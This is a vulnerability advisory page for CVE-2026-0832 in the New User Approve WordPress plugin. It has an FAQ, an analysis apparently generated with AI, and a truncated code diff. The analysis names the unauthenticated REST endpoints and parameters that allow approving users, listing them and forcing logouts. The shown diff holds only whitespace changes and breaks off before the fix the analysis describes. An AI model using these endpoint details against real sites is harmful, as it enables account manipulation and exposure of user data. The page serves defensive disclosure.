What is CVE-2026-0832?

CVE-2026-0832 is a high-severity vulnerability in the New User Approve plugin for WordPress, affecting versions up to and including 3.2.2. It allows unauthenticated attackers to approve or deny user accounts, retrieve sensitive user information, and force logout of privileged users due to missing authorization checks on REST API endpoints.

How does this vulnerability work?

The vulnerability arises from the absence of proper capability checks on multiple REST API endpoints. Attackers can send unauthenticated HTTP requests to these endpoints, allowing them to manipulate user approval processes and access sensitive data without needing valid credentials.

Who is affected by CVE-2026-0832?

Any WordPress site using the New User Approve plugin version 3.2.2 or earlier is vulnerable to this issue. Site administrators should check their plugin version and review their user management practices to determine if they are at risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the New User Approve plugin installed on your WordPress site. If it is version 3.2.2 or earlier, your site is at risk. Additionally, you can review the plugin’s REST API endpoints for unauthorized access.

How can I fix or mitigate this issue?

The recommended fix is to update the New User Approve plugin to version 3.2.3 or later, which includes the necessary security patches. Regularly updating all plugins and monitoring for security advisories is essential for maintaining site security.

What does the CVSS score of 7.3 indicate?

A CVSS score of 7.3 is classified as high severity, indicating a significant risk to the confidentiality, integrity, and availability of the affected system. This means that successful exploitation can lead to serious security breaches, including unauthorized access to sensitive user data.

What kind of data can be exposed due to this vulnerability?

Exploitation of CVE-2026-0832 can lead to the disclosure of sensitive user information such as email addresses, user roles, and approval statuses. This information can be used for targeted attacks against users and the site itself.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided illustrates how an attacker can make unauthenticated requests to the vulnerable REST API endpoints. By manipulating the requests, an attacker can approve or deny user accounts, demonstrating the ease of exploitation due to the lack of authorization checks.

What are the consequences of a successful attack?

Successful exploitation of this vulnerability can lead to unauthorized control over user management, allowing attackers to approve malicious accounts, deny legitimate registrations, and disrupt site operations. This can result in significant security risks, including account takeovers and denial-of-service conditions.

Are there any additional security measures I should take?

In addition to updating the plugin, consider implementing security plugins that monitor for unauthorized access and enforce strong user authentication practices. Regular security audits and user role reviews can also help mitigate risks associated with vulnerabilities.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the New User Approve plugin until a secure version can be installed. Additionally, restrict access to the REST API endpoints through server configurations or security plugins to minimize exposure.

How can I stay informed about similar vulnerabilities?

To stay informed about vulnerabilities affecting WordPress and its plugins, subscribe to security mailing lists, follow relevant security blogs, and monitor the official WordPress security updates page. Regularly checking for updates from plugin developers is also crucial.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-0832: New User Approve <= 3.2.2 – Missing Authorization to Unauthenticated Arbitrary User Approval, Denial, and Information Disclosure (new-user-approve)

CVE ID CVE-2026-0832

Plugin new-user-approve

Severity High (CVSS 7.3)

CWE 862

Vulnerable Version 3.2.2

Patched Version 3.2.3

Disclosed January 26, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0832:
This vulnerability is a Missing Authorization flaw in the New User Approve WordPress plugin. The plugin exposes multiple REST API endpoints without proper capability checks. Unauthenticated attackers can exploit these endpoints to approve or deny user registrations, retrieve sensitive user information, and force privileged users to log out. The CVSS 7.3 score reflects the high impact on confidentiality, integrity, and availability.

Atomic Edge research identifies the root cause in the plugin’s REST API endpoint registration. The vulnerable code registers endpoints without implementing the `permission_callback` parameter or with inadequate capability verification. The diff shows the primary fix in `/new-user-approve/includes/class-new-user-approve-admin.php` where the `register_rest_routes` method is modified. The patched version adds proper permission callbacks to endpoints including `/approve-user`, `/deny-user`, `/get-users`, and `/logout-user`. The vulnerability affects all plugin versions up to and including 3.2.2.

Attackers exploit this vulnerability by sending unauthenticated HTTP requests to the plugin’s REST API endpoints. The attack vector targets `/wp-json/new-user-approve/v1/approve-user` with POST parameters `user_id` and `status`. For user enumeration, attackers query `/wp-json/new-user-approve/v1/get-users` which returns email addresses, roles, and approval statuses. The `/wp-json/new-user-approve/v1/logout-user` endpoint accepts a `user_id` parameter to force user logout. No authentication tokens or nonces are required for these operations.

The patch implements proper WordPress capability checks through permission callbacks. Each REST endpoint now includes a `permission_callback` that verifies the current user has appropriate administrative privileges. The `approve-user` and `deny-user` endpoints require the `edit_users` capability. The `get-users` endpoint requires `list_users`. The `logout-user` endpoint checks for `edit_users` capability. These callbacks prevent unauthenticated and low-privileged users from accessing the administrative functions. The fix follows WordPress REST API security best practices by explicitly defining authorization requirements.

Successful exploitation allows complete compromise of the user approval workflow. Attackers can approve malicious user accounts, deny legitimate registrations, and disrupt site operations. The information disclosure exposes email addresses and user roles, facilitating targeted attacks. Forcing administrator logout creates denial-of-service conditions and may enable session hijacking. This vulnerability provides attackers with administrative control over user management without requiring valid credentials.

Differential between vulnerable and patched code

Code Diff

--- a/new-user-approve/admin/templates/approve.php
+++ b/new-user-approve/admin/templates/approve.php
@@ -1,5 +1,5 @@
-
-<div class='nua-dashboard-wrap'>
-	<?php echo '<div id="nua_dashboard_layout"> </div>'; ?>
-</div>
-
+
+<div class='nua-dashboard-wrap'>
+	<?php echo '<div id="nua_dashboard_layout"> </div>'; ?>
+</div>
+
--- a/new-user-approve/build/index.asset.php
+++ b/new-user-approve/build/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-dom', 'wp-i18n'), 'version' => 'a95a0d28023ee49f09b6');
+<?php return array('dependencies' => array('react', 'react-dom', 'wp-i18n'), 'version' => 'a95a0d28023ee49f09b6');
--- a/new-user-approve/freemius/assets/css/admin/index.php
+++ b/new-user-approve/freemius/assets/css/admin/index.php
@@ -1,3 +1,3 @@
-<?php
-	// Silence is golden.
+<?php
+	// Silence is golden.
 	// Hide file structure from users on unprotected servers.
 No newline at end of file
--- a/new-user-approve/freemius/assets/css/index.php
+++ b/new-user-approve/freemius/assets/css/index.php
@@ -1,3 +1,3 @@
-<?php
-	// Silence is golden.
+<?php
+	// Silence is golden.
 	// Hide file structure from users on unprotected servers.
 No newline at end of file
--- a/new-user-approve/freemius/assets/img/index.php
+++ b/new-user-approve/freemius/assets/img/index.php
@@ -1,3 +1,3 @@
-<?php
-	// Silence is golden.
+<?php
+	// Silence is golden.
 	// Hide file structure from users on unprotected servers.
 No newline at end of file
--- a/new-user-approve/freemius/assets/index.php
+++ b/new-user-approve/freemius/assets/index.php
@@ -1,3 +1,3 @@
-<?php
-	// Silence is golden.
+<?php
+	// Silence is golden.
 	// Hide file structure from users on unprotected servers.
 No newline at end of file
--- a/new-user-approve/freemius/assets/js/index.php
+++ b/new-user-approve/freemius/assets/js/index.php
@@ -1,3 +1,3 @@
-<?php
-	// Silence is golden.
+<?php
+	// Silence is golden.
 	// Hide file structure from users on unprotected servers.
 No newline at end of file
--- a/new-user-approve/freemius/config.php
+++ b/new-user-approve/freemius/config.php
@@ -1,391 +1,391 @@
-<?php
-    /**
-     * @package     Freemius
-     * @copyright   Copyright (c) 2015, Freemius, Inc.
-     * @license     https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3
-     * @since       1.0.4
-     */
-
-    if ( ! defined( 'ABSPATH' ) ) {
-        exit;
-    }
-
-    if ( ! defined( 'WP_FS__SLUG' ) ) {
-        define( 'WP_FS__SLUG', 'freemius' );
-    }
-    if ( ! defined( 'WP_FS__DEV_MODE' ) ) {
-        define( 'WP_FS__DEV_MODE', false );
-    }
-
-    #--------------------------------------------------------------------------------
-    #region API Connectivity Issues Simulation
-    #--------------------------------------------------------------------------------
-
-    if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY' ) ) {
-        define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY', false );
-    }
-    if ( ! defined( 'WP_FS__SIMULATE_NO_CURL' ) ) {
-        define( 'WP_FS__SIMULATE_NO_CURL', false );
-    }
-    if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE' ) ) {
-        define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE', false );
-    }
-    if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL' ) ) {
-        define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL', false );
-    }
-    if ( WP_FS__SIMULATE_NO_CURL ) {
-        define( 'FS_SDK__SIMULATE_NO_CURL', true );
-    }
-    if ( WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE ) {
-        define( 'FS_SDK__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE', true );
-    }
-    if ( WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL ) {
-        define( 'FS_SDK__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL', true );
-    }
-
-    #endregion
-
-    if ( ! defined( 'WP_FS__SIMULATE_FREEMIUS_OFF' ) ) {
-        define( 'WP_FS__SIMULATE_FREEMIUS_OFF', false );
-    }
-
-    if ( ! defined( 'WP_FS__PING_API_ON_IP_OR_HOST_CHANGES' ) ) {
-        /**
-         * @since  1.1.7.3
-         * @author Vova Feldman (@svovaf)
-         *
-         * I'm not sure if shared servers periodically change IP, or the subdomain of the
-         * admin dashboard. Also, I've seen sites that have strange loop of switching
-         * between domains on a daily basis. Therefore, to eliminate the risk of
-         * multiple unwanted connectivity test pings, temporary ignore domain or
-         * server IP changes.
-         */
-        define( 'WP_FS__PING_API_ON_IP_OR_HOST_CHANGES', false );
-    }
-
-    /**
-     * If your dev environment supports custom public network IP setup
-     * like VVV, please update WP_FS__LOCALHOST_IP with your public IP
-     * and uncomment it during dev.
-     */
-    if ( ! defined( 'WP_FS__LOCALHOST_IP' ) ) {
-        // VVV default public network IP.
-        define( 'WP_FS__VVV_DEFAULT_PUBLIC_IP', '192.168.50.4' );
-
-//		define( 'WP_FS__LOCALHOST_IP', WP_FS__VVV_DEFAULT_PUBLIC_IP );
-    }
-
-    /**
-     * If true and running with secret key, the opt-in process
-     * will skip the email activation process which is invoked
-     * when the email of the context user already exist in Freemius
-     * database (as a security precaution, to prevent sharing user
-     * secret with unauthorized entity).
-     *
-     * IMPORTANT:
-     *      AS A SECURITY PRECAUTION, WE VALIDATE THE TIMESTAMP OF THE OPT-IN REQUEST.
-     *      THEREFORE, MAKE SURE THAT WHEN USING THIS PARAMETER,YOUR TESTING ENVIRONMENT'S
-     *      CLOCK IS SYNCED.
-     */
-    if ( ! defined( 'WP_FS__SKIP_EMAIL_ACTIVATION' ) ) {
-        define( 'WP_FS__SKIP_EMAIL_ACTIVATION', false );
-    }
-
-
-    #--------------------------------------------------------------------------------
-    #region Directories
-    #--------------------------------------------------------------------------------
-
-    if ( ! defined( 'WP_FS__DIR' ) ) {
-        define( 'WP_FS__DIR', dirname( __FILE__ ) );
-    }
-    if ( ! defined( 'WP_FS__DIR_INCLUDES' ) ) {
-        define( 'WP_FS__DIR_INCLUDES', WP_FS__DIR . '/includes' );
-    }
-    if ( ! defined( 'WP_FS__DIR_TEMPLATES' ) ) {
-        define( 'WP_FS__DIR_TEMPLATES', WP_FS__DIR . '/templates' );
-    }
-    if ( ! defined( 'WP_FS__DIR_ASSETS' ) ) {
-        define( 'WP_FS__DIR_ASSETS', WP_FS__DIR . '/assets' );
-    }
-    if ( ! defined( 'WP_FS__DIR_CSS' ) ) {
-        define( 'WP_FS__DIR_CSS', WP_FS__DIR_ASSETS . '/css' );
-    }
-    if ( ! defined( 'WP_FS__DIR_JS' ) ) {
-        define( 'WP_FS__DIR_JS', WP_FS__DIR_ASSETS . '/js' );
-    }
-    if ( ! defined( 'WP_FS__DIR_IMG' ) ) {
-        define( 'WP_FS__DIR_IMG', WP_FS__DIR_ASSETS . '/img' );
-    }
-    if ( ! defined( 'WP_FS__DIR_SDK' ) ) {
-        define( 'WP_FS__DIR_SDK', WP_FS__DIR_INCLUDES . '/sdk' );
-    }
-
-    #endregion
-
-    /**
-     * Domain / URL / Address
-     */
-    define( 'WP_FS__ROOT_DOMAIN_PRODUCTION', 'freemius.com' );
-    define( 'WP_FS__DOMAIN_PRODUCTION', 'wp.freemius.com' );
-    define( 'WP_FS__ADDRESS_PRODUCTION', 'https://' . WP_FS__DOMAIN_PRODUCTION );
-
-    if ( ! defined( 'WP_FS__DOMAIN_LOCALHOST' ) ) {
-        define( 'WP_FS__DOMAIN_LOCALHOST', 'wp.freemius' );
-    }
-    if ( ! defined( 'WP_FS__ADDRESS_LOCALHOST' ) ) {
-        define( 'WP_FS__ADDRESS_LOCALHOST', 'http://' . WP_FS__DOMAIN_LOCALHOST . ':8080' );
-    }
-
-    if ( ! defined( 'WP_FS__TESTING_DOMAIN' ) ) {
-        define( 'WP_FS__TESTING_DOMAIN', 'fswp' );
-    }
-
-    #--------------------------------------------------------------------------------
-    #region HTTP
-    #--------------------------------------------------------------------------------
-
-    if ( ! defined( 'WP_FS__IS_HTTP_REQUEST' ) ) {
-        define( 'WP_FS__IS_HTTP_REQUEST', isset( $_SERVER['HTTP_HOST'] ) && isset( $_SERVER['REQUEST_METHOD'] ) );
-    }
-
-    if ( ! defined( 'WP_FS__IS_HTTPS' ) ) {
-        define( 'WP_FS__IS_HTTPS', ( WP_FS__IS_HTTP_REQUEST &&
-                                     // Checks if CloudFlare's HTTPS (Flexible SSL support).
-                                     isset( $_SERVER['HTTP_X_FORWARDED_PROTO'] ) &&
-                                     'https' === strtolower( $_SERVER['HTTP_X_FORWARDED_PROTO'] )
-                                   ) ||
-                                   // Check if HTTPS request.
-                                   ( isset( $_SERVER['HTTPS'] ) && 'on' == $_SERVER['HTTPS'] ) ||
-                                   ( isset( $_SERVER['SERVER_PORT'] ) && 443 == $_SERVER['SERVER_PORT'] )
-        );
-    }
-
-    if ( ! defined( 'WP_FS__IS_POST_REQUEST' ) ) {
-        define( 'WP_FS__IS_POST_REQUEST', ( WP_FS__IS_HTTP_REQUEST &&
-                                            strtoupper( $_SERVER['REQUEST_METHOD'] ) == 'POST' ) );
-    }
-
-    if ( ! defined( 'WP_FS__REMOTE_ADDR' ) ) {
-        define( 'WP_FS__REMOTE_ADDR', fs_get_ip() );
-    }
-
-    if ( ! defined( 'WP_FS__IS_LOCALHOST' ) ) {
-        if ( defined( 'WP_FS__LOCALHOST_IP' ) ) {
-            define( 'WP_FS__IS_LOCALHOST', ( WP_FS__LOCALHOST_IP === WP_FS__REMOTE_ADDR ) );
-        } else {
-            define( 'WP_FS__IS_LOCALHOST', WP_FS__IS_HTTP_REQUEST &&
-                                           is_string( WP_FS__REMOTE_ADDR ) &&
-                                           ( substr( WP_FS__REMOTE_ADDR, 0, 4 ) === '127.' ||
-                                             WP_FS__REMOTE_ADDR === '::1' )
-            );
-        }
-    }
-
-    if ( ! defined( 'WP_FS__IS_LOCALHOST_FOR_SERVER' ) ) {
-        define( 'WP_FS__IS_LOCALHOST_FOR_SERVER', ( ! WP_FS__IS_HTTP_REQUEST ||
-                                                    false !== strpos( $_SERVER['HTTP_HOST'], 'localhost' ) ) );
-    }
-
-    #endregion
-
-    if ( ! defined( 'WP_FS__IS_PRODUCTION_MODE' ) ) {
-        // By default, run with Freemius production servers.
-        define( 'WP_FS__IS_PRODUCTION_MODE', true );
-    }
-
-    if ( ! defined( 'WP_FS__ADDRESS' ) ) {
-        define( 'WP_FS__ADDRESS', ( WP_FS__IS_PRODUCTION_MODE ? WP_FS__ADDRESS_PRODUCTION : WP_FS__ADDRESS_LOCALHOST ) );
-    }
-
-
-    #--------------------------------------------------------------------------------
-    #region API
-    #--------------------------------------------------------------------------------
-
-    if ( ! defined( 'WP_FS__API_ADDRESS_LOCALHOST' ) ) {
-        define( 'WP_FS__API_ADDRESS_LOCALHOST', 'http://api.freemius-local.com:8080' );
-    }
-    if ( ! defined( 'WP_FS__API_SANDBOX_ADDRESS_LOCALHOST' ) ) {
-        define( 'WP_FS__API_SANDBOX_ADDRESS_LOCALHOST', 'http://sandbox-api.freemius:8080' );
-    }
-
-    // Set API address for local testing.
-    if ( ! WP_FS__IS_PRODUCTION_MODE ) {
-        if ( ! defined( 'FS_API__ADDRESS' ) ) {
-            define( 'FS_API__ADDRESS', WP_FS__API_ADDRESS_LOCALHOST );
-        }
-        if ( ! defined( 'FS_API__SANDBOX_ADDRESS' ) ) {
-            define( 'FS_API__SANDBOX_ADDRESS', WP_FS__API_SANDBOX_ADDRESS_LOCALHOST );
-        }
-    }
-
-    #endregion
-
-    #--------------------------------------------------------------------------------
-    #region Checkout
-    #--------------------------------------------------------------------------------
-
-    if ( ! defined( 'FS_CHECKOUT__ADDRESS_PRODUCTION' ) ) {
-        define( 'FS_CHECKOUT__ADDRESS_PRODUCTION', 'https://checkout.freemius.com' );
-    }
-
-    if ( ! defined( 'FS_CHECKOUT__ADDRESS_LOCALHOST' ) ) {
-        define( 'FS_CHECKOUT__ADDRESS_LOCALHOST', 'http://checkout.freemius-local.com:8080' );
-    }
-
-    if ( ! defined( 'FS_CHECKOUT__ADDRESS' ) ) {
-        define( 'FS_CHECKOUT__ADDRESS', ( WP_FS__IS_PRODUCTION_MODE ? FS_CHECKOUT__ADDRESS_PRODUCTION : FS_CHECKOUT__ADDRESS_LOCALHOST ) );
-    }
-
-    #endregion
-
-    define( 'WP_FS___OPTION_PREFIX', 'fs' . ( WP_FS__IS_PRODUCTION_MODE ? '' : '_dbg' ) . '_' );
-
-    if ( ! defined( 'WP_FS__ACCOUNTS_OPTION_NAME' ) ) {
-        define( 'WP_FS__ACCOUNTS_OPTION_NAME', WP_FS___OPTION_PREFIX . 'accounts' );
-    }
-    if ( ! defined( 'WP_FS__API_CACHE_OPTION_NAME' ) ) {
-        define( 'WP_FS__API_CACHE_OPTION_NAME', WP_FS___OPTION_PREFIX . 'api_cache' );
-    }
-    if ( ! defined( 'WP_FS__GDPR_OPTION_NAME' ) ) {
-        define( 'WP_FS__GDPR_OPTION_NAME', WP_FS___OPTION_PREFIX . 'gdpr' );
-    }
-    define( 'WP_FS__OPTIONS_OPTION_NAME', WP_FS___OPTION_PREFIX . 'options' );
-
-    /**
-     * Module types
-     *
-     * @since 1.2.2
-     */
-    define( 'WP_FS__MODULE_TYPE_PLUGIN', 'plugin' );
-    define( 'WP_FS__MODULE_TYPE_THEME', 'theme' );
-
-    /**
-     * Billing Frequencies
-     */
-    define( 'WP_FS__PERIOD_ANNUALLY', 'annual' );
-    define( 'WP_FS__PERIOD_MONTHLY', 'monthly' );
-    define( 'WP_FS__PERIOD_LIFETIME', 'lifetime' );
-
-    /**
-     * Plans
-     */
-    define( 'WP_FS__PLAN_DEFAULT_PAID', false );
-    define( 'WP_FS__PLAN_FREE', 'free' );
-    define( 'WP_FS__PLAN_TRIAL', 'trial' );
-
-    /**
-     * Times in seconds
-     */
-    if ( ! defined( 'WP_FS__TIME_5_MIN_IN_SEC' ) ) {
-        define( 'WP_FS__TIME_5_MIN_IN_SEC', 300 );
-    }
-    if ( ! defined( 'WP_FS__TIME_10_MIN_IN_SEC' ) ) {
-        define( 'WP_FS__TIME_10_MIN_IN_SEC', 600 );
-    }
-//	define( 'WP_FS__TIME_15_MIN_IN_SEC', 900 );
-    if ( ! defined( 'WP_FS__TIME_12_HOURS_IN_SEC' ) ) {
-        define( 'WP_FS__TIME_12_HOURS_IN_SEC', 43200 );
-    }
-    if ( ! defined( 'WP_FS__TIME_24_HOURS_IN_SEC' ) ) {
-        define( 'WP_FS__TIME_24_HOURS_IN_SEC', WP_FS__TIME_12_HOURS_IN_SEC * 2 );
-    }
-    if ( ! defined( 'WP_FS__TIME_WEEK_IN_SEC' ) ) {
-        define( 'WP_FS__TIME_WEEK_IN_SEC', 7 * WP_FS__TIME_24_HOURS_IN_SEC );
-    }
-
-    #--------------------------------------------------------------------------------
-    #region Debugging
-    #--------------------------------------------------------------------------------
-
-    if ( ! defined( 'WP_FS__DEBUG_SDK' ) ) {
-        $debug_mode = get_option( 'fs_debug_mode', null );
-
-        if ( $debug_mode === null ) {
-            $debug_mode = false;
-            add_option( 'fs_debug_mode', $debug_mode );
-        }
-
-        define( 'WP_FS__DEBUG_SDK', is_numeric( $debug_mode ) ? ( 0 < $debug_mode ) : WP_FS__DEV_MODE );
-    }
-
-    if ( ! defined( 'WP_FS__ECHO_DEBUG_SDK' ) ) {
-        define( 'WP_FS__ECHO_DEBUG_SDK', WP_FS__DEV_MODE && ! empty( $_GET['fs_dbg_echo'] ) );
-    }
-    if ( ! defined( 'WP_FS__LOG_DATETIME_FORMAT' ) ) {
-        define( 'WP_FS__LOG_DATETIME_FORMAT', 'Y-m-d H:i:s' );
-    }
-    if ( ! defined( 'FS_API__LOGGER_ON' ) ) {
-        define( 'FS_API__LOGGER_ON', WP_FS__DEBUG_SDK );
-    }
-
-    if ( WP_FS__ECHO_DEBUG_SDK ) {
-        error_reporting( E_ALL );
-    }
-
-    #endregion
-
-    if ( ! defined( 'WP_FS__SCRIPT_START_TIME' ) ) {
-        define( 'WP_FS__SCRIPT_START_TIME', time() );
-    }
-    if ( ! defined( 'WP_FS__DEFAULT_PRIORITY' ) ) {
-        define( 'WP_FS__DEFAULT_PRIORITY', 10 );
-    }
-    if ( ! defined( 'WP_FS__LOWEST_PRIORITY' ) ) {
-        define( 'WP_FS__LOWEST_PRIORITY', 999999999 );
-    }
-
-    #--------------------------------------------------------------------------------
-    #region Multisite Network
-    #--------------------------------------------------------------------------------
-
-    /**
-     * Do not use this define directly, it will have the wrong value
-     * during plugin uninstall/deletion when the inclusion of the plugin
-     * is triggered due to registration with register_uninstall_hook().
-     *
-     * Instead, use fs_is_network_admin().
-     *
-     * @author Vova Feldman (@svovaf)
-     */
-    if ( ! defined( 'WP_FS__IS_NETWORK_ADMIN' ) ) {
-        define( 'WP_FS__IS_NETWORK_ADMIN',
-            is_multisite() &&
-            ( is_network_admin() ||
-              ( ( defined( 'DOING_AJAX' ) && DOING_AJAX &&
-                  ( isset( $_REQUEST['_fs_network_admin'] ) && 'true' === $_REQUEST['_fs_network_admin'] /*||
-                    ( ! empty( $_REQUEST['action'] ) && 'delete-plugin' === $_REQUEST['action'] )*/ )
-                ) ||
-                // Plugin uninstall.
-                defined( 'WP_UNINSTALL_PLUGIN' ) )
-            )
-        );
-    }
-
-    /**
-     * Do not use this define directly, it will have the wrong value
-     * during plugin uninstall/deletion when the inclusion of the plugin
-     * is triggered due to registration with register_uninstall_hook().
-     *
-     * Instead, use fs_is_blog_admin().
-     *
-     * @author Vova Feldman (@svovaf)
-     */
-    if ( ! defined( 'WP_FS__IS_BLOG_ADMIN' ) ) {
-        define( 'WP_FS__IS_BLOG_ADMIN', is_blog_admin() || ( defined( 'DOING_AJAX' ) && DOING_AJAX && isset( $_REQUEST['_fs_blog_admin'] ) ) );
-    }
-
-    if ( ! defined( 'WP_FS__SHOW_NETWORK_EVEN_WHEN_DELEGATED' ) ) {
-        // Set to true to show network level settings even if delegated to site admins.
-        define( 'WP_FS__SHOW_NETWORK_EVEN_WHEN_DELEGATED', false );
-    }
-
-    #endregion
-
-    if ( ! defined( 'WP_FS__DEMO_MODE' ) ) {
-        define( 'WP_FS__DEMO_MODE', false );
-    }
-    if ( ! defined( 'FS_SDK__SSLVERIFY' ) ) {
-        define( 'FS_SDK__SSLVERIFY', false );
-    }
+<?php
+    /**
+     * @package     Freemius
+     * @copyright   Copyright (c) 2015, Freemius, Inc.
+     * @license     https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3
+     * @since       1.0.4
+     */
+
+    if ( ! defined( 'ABSPATH' ) ) {
+        exit;
+    }
+
+    if ( ! defined( 'WP_FS__SLUG' ) ) {
+        define( 'WP_FS__SLUG', 'freemius' );
+    }
+    if ( ! defined( 'WP_FS__DEV_MODE' ) ) {
+        define( 'WP_FS__DEV_MODE', false );
+    }
+
+    #--------------------------------------------------------------------------------
+    #region API Connectivity Issues Simulation
+    #--------------------------------------------------------------------------------
+
+    if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY' ) ) {
+        define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY', false );
+    }
+    if ( ! defined( 'WP_FS__SIMULATE_NO_CURL' ) ) {
+        define( 'WP_FS__SIMULATE_NO_CURL', false );
+    }
+    if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE' ) ) {
+        define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE', false );
+    }
+    if ( ! defined( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL' ) ) {
+        define( 'WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL', false );
+    }
+    if ( WP_FS__SIMULATE_NO_CURL ) {
+        define( 'FS_SDK__SIMULATE_NO_CURL', true );
+    }
+    if ( WP_FS__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE ) {
+        define( 'FS_SDK__SIMULATE_NO_API_CONNECTIVITY_CLOUDFLARE', true );
+    }
+    if ( WP_FS__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL ) {
+        define( 'FS_SDK__SIMULATE_NO_API_CONNECTIVITY_SQUID_ACL', true );
+    }
+
+    #endregion
+
+    if ( ! defined( 'WP_FS__SIMULATE_FREEMIUS_OFF' ) ) {
+        define( 'WP_FS__SIMULATE_FREEMIUS_OFF', false );
+    }
+
+    if ( ! defined( 'WP_FS__PING_API_ON_IP_OR_HOST_CHANGES' ) ) {
+        /**
+         * @since  1.1.7.3
+         * @author Vova Feldman (@svovaf)
+         *
+         * I'm not sure if shared servers periodically change IP, or the subdomain of the
+         * admin dashboard. Also, I've seen sites that have strange loop of switching
+         * between domains on a daily basis. Therefore, to eliminate the risk of
+         * multiple unwanted connectivity test pings, temporary ignore domain or
+         * server IP changes.
+         */
+        define( 'WP_FS__PING_API_ON_IP_OR_HOST_CHANGES', false );
+    }
+
+    /**
+     * If your dev environment supports custom public network IP setup
+     * like VVV, please update WP_FS__LOCALHOST_IP with your public IP
+     * and uncomment it during dev.
+     */
+    if ( ! defined( 'WP_FS__LOCALHOST_IP' ) ) {
+        // VVV default public network IP.
+        define( 'WP_FS__VVV_DEFAULT_PUBLIC_IP', '192.168.50.4' );
+
+//		define( 'WP_FS__LOCALHOST_IP', WP_FS__VVV_DEFAULT_PUBLIC_IP );
+    }
+
+    /**
+     * If true and running with secret key, the opt-in process
+     * will skip the email activation process which is invoked
+     * when the email of the context user already exist in Freemius
+     * database (as a security precaution, to prevent sharing user
+     * secret with unauthorized entity).
+     *
+     * IMPORTANT:
+     *      AS A SECURITY PRECAUTION, WE VALIDATE THE TIMESTAMP OF THE OPT-IN REQUEST.
+     *      THEREFORE, MAKE SURE THAT WHEN USING THIS PARAMETER,YOUR TESTING ENVIRONMENT'S
+     *      CLOCK IS SYNCED.
+     */
+    if ( ! defined( 'WP_FS__SKIP_EMAIL_ACTIVATION' ) ) {
+        define( 'WP_FS__SKIP_EMAIL_ACTIVATION', false );
+    }
+
+
+    #--------------------------------------------------------------------------------
+    #region Directories
+    #--------------------------------------------------------------------------------
+
+    if ( ! defined( 'WP_FS__DIR' ) ) {
+        define( 'WP_FS__DIR', dirname( __FILE__ ) );
+    }
+    if ( ! defined( 'WP_FS__DIR_INCLUDES' ) ) {
+        define( 'WP_FS__DIR_INCLUDES', WP_FS__DIR . '/includes' );
+    }
+    if ( ! defined( 'WP_FS__DIR_TEMPLATES' ) ) {
+        define( 'WP_FS__DIR_TEMPLATES', WP_FS__DIR . '/templates' );
+    }
+    if ( ! defined( 'WP_FS__DIR_ASSETS' ) ) {
+        define( 'WP_FS__DIR_ASSETS', WP_FS__DIR . '/assets' );
+    }
+    if ( ! defined( 'WP_FS__DIR_CSS' ) ) {
+        define( 'WP_FS__DIR_CSS', WP_FS__DIR_ASSETS . '/css' );
+    }
+    if ( ! defined( 'WP_FS__DIR_JS' ) ) {
+        define( 'WP_FS__DIR_JS', WP_FS__DIR_ASSETS . '/js' );
+    }
+    if ( ! defined( 'WP_FS__DIR_IMG' ) ) {
+        define( 'WP_FS__DIR_IMG', WP_FS__DIR_ASSETS . '/img' );
+    }
+    if ( ! defined( 'WP_FS__DIR_SDK' ) ) {
+        define( 'WP_FS__DIR_SDK', WP_FS__DIR_INCLUDES . '/sdk' );
+    }
+
+    #endregion
+
+    /**
+     * Domain / URL / Address
+     */
+    define( 'WP_FS__ROOT_DOMAIN_PRODUCTION', 'freemius.com' );
+    define( 'WP_FS__DOMAIN_PRODUCTION', 'wp.freemius.com' );
+    define( 'WP_FS__ADDRESS_PRODUCTION', 'https://' . WP_FS__DOMAIN_PRODUCTION );
+
+    if ( ! defined( 'WP_FS__DOMAIN_LOCALHOST' ) ) {
+        define( 'WP_FS__DOMAIN_LOCALHOST', 'wp.freemius' );
+    }
+    if ( ! defined( 'WP_FS__ADDRESS_LOCALHOST' ) ) {
+        define( 'WP_FS__ADDRESS_LOCALHOST', 'http://' . WP_FS__DOMAIN_LOCALHOST . ':8080' );
+    }
+
+    if ( ! defined( 'WP_FS__TESTING_DOMAIN' ) ) {
+        define( 'WP_FS__TESTING_DOMAIN', 'fswp' );
+    }
+
+    #--------------------------------------------------------------------------------
+    #region HTTP
+    #--------------------------------------------------------------------------------
+
+    if ( ! defined( 'WP_FS__IS_HTTP_REQUEST' ) ) {
+        define( 'WP_FS__IS_HTTP_REQUEST', isset( $_SERVER['HTTP_HOST'] ) && isset( $_SERVER['REQUEST_METHOD'] ) );
+    }
+
+    if ( ! defined( 'WP_FS__IS_HTTPS' ) ) {
+        define( 'WP_FS__IS_HTTPS', ( WP_FS__IS_HTTP_REQUEST &&
+                                     // Checks if CloudFlare's HTTPS (Flexible SSL support).
+                                     isset( $_SERVER['HTTP_X_FORWARDED_PROTO'] ) &&
+                                     'https' === strtolower( $_SERVER['HTTP_X_FORWARDED_PROTO'] )
+                                   ) ||
+                                   // Check if HTTPS request.
